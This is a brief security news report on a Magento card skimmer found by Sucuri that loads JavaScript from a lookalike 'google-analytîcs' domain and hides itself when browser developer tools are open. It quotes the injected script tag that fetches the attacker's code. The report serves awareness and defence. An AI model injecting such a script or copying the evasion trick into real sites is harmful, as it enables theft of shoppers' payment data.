Cybercriminals have found a new way to steal money from users who make online transactions. Hackers use fake domains that are supposedly from Google and lead users to compromised sites. Seeing the domain , users think that the site is safe. Researchers from Sucuri contacted a Magento website owner and were informed that a domain had been infected with a credit card skimmer . The skimmer uses JavaScript code that contains a link to the malicious address google-analytîcs [.] Com.
Here is an example of the malicious code:
<script type = “text / javascript” src = “//google-analytîcs.com/www.[redacted]/3f5cf4657d5d9.js”> </ script>
Researchers said hackers use trusted names, such as Google, so visitors think the sites are safe. However, they don't notice that there is a variation in the domainthat indicates it is a malicious site.
Researchers discovered that this skimmer is similar to others in circulation and stores datathat is entered, as well as drop-down menu options.

However, the skimmer checks whether developer tools are being used in either Google Chrome or Mozilla Firefox. If they are, it will not attempt to steal any information to avoid detection.
If no developer tools are detected, it steals information and sends it to a remote server.
Card skimmers are installed through vulnerable e-commerce sites and are a serious and common problem. In July, software company RiskIQ said that a recent campaign managed to infect more than 17,000 websites with card-skimming malware in just a few months.
Magento users, like WordPress and Drupal, need to keep their software up to date. Magento domains are a target for hackers trying to steal financial data. A report showed that in 2018, 83% of Magento websites were found to be vulnerable to card skimmers.
